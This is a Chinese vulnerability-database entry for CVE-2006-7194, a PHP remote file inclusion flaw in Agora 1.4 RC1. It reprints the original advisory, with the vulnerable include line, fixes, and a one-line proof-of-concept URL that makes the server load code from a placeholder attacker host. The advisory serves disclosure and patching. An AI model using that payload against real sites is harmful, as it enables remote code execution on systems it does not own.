Agora 'MysqlfinderAdmin.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111478 漏洞类型 未知
发布时间 2006-11-06 更新时间 2007-04-18
CVE编号 CVE-2006-7194 CNNVD-ID CNNVD-200704-319
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/2726
https://www.securityfocus.com/bid/86822
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-319
|漏洞详情
Agora的modules/Mysqlfinder/MysqlfinderAdmin.php中存在PHP远程文件包含漏洞。当register_globals被启用时,远程攻击者可以借助_SESSION[PATH_COMPOSANT]参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \
 |    __)_ /    \  \//    ~    \/   |   \
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/                              .OR.ID
ECHO_ADV_59$2006

-----------------------------------------------------------------------------------------------
[ECHO_ADV_59$2006]Agora 1.4 RC1  "$_SESSION[PATH_COMPOSANT]" Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------------

Author		: Dedi Dwianto a.k.a the_day
Date Found	: November, 01nd 2006
Location	: Indonesia, Jakarta
web		: http://advisories.echo.or.id/adv/adv59-theday-2006.txt
Critical Lvl	: Highly critical
Impact		: System access
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application	: Agora
version		: 1.4 RC1
URL		: http://www.agora.gouv.fr

Based on the free software Spip, Agora is a free software of management of contents for 
Internet developed in php, which makes it possible to put in place and to manage quickly 
and with lower cost of the Internet sites, Intranet or extranet.
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

I found vulnerability in modules/Mysqlfinder/MysqlfinderAdmin.php
--------------------------modules/Mysqlfinder/MysqlfinderAdmin.php----------
....
<?
include_once($_SESSION["PATH_COMPOSANT"]."Commun/Template.inc")
...
----------------------------------------------------------

Input passed to the "$_SESSION["PATH_COMPOSANT"]" parameter in Mysqlfinder.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.



Proof Of Concept:
~~~~~~~~~~~~~~~

http://target.com/[agora-1.4-path]/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=http://attacker.com/inject.txt?


Solution:
~~~~~~~

- Insert new line code :
  ...
  include_once 'MysqlfinderParam.inc';
  ...
  
  Before include_once($_SESSION["PATH_COMPOSANT"]."Commun/Template.inc")

- Turn off register_globals
- Turn off display_error to Hide Full Path Error

Timeline :
~~~~~~~~~

01 - 11 - 2006 bugs found
01 - 11 - 2006 vendor contacted
07 - 11 - 2006 public disclosure

---------------------------------------------------------------------------

Shoutz:
~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~
     EcHo Research & Development Center
     the_day[at]echo[dot]or[dot]id
     
-------------------------------- [ EOF ]----------------------------------

# milw0rm.com [2006-11-06]
|受影响的产品
Republique Francaise Agora 1.4 RC1
|参考资料

来源:XF
名称:agora-mysqlfinderadmin-file-include(30031)
链接:http://xforce.iss.net/xforce/xfdb/30031
来源:MILW0RM
名称:2726
链接:http://www.milw0rm.com/exploits/2726
来源:BUGTRAQ
名称:20061106[ECHO_ADV_59_2006]Agora1.4RC1""$_SESSION[PATH_COMPOSANT]""
链接:http://marc.info/?l=bugtraq&m=116283849004075&w=2
来源:MISC
链接:http://advisories.echo.or.id/adv/adv59-theday-2006.txt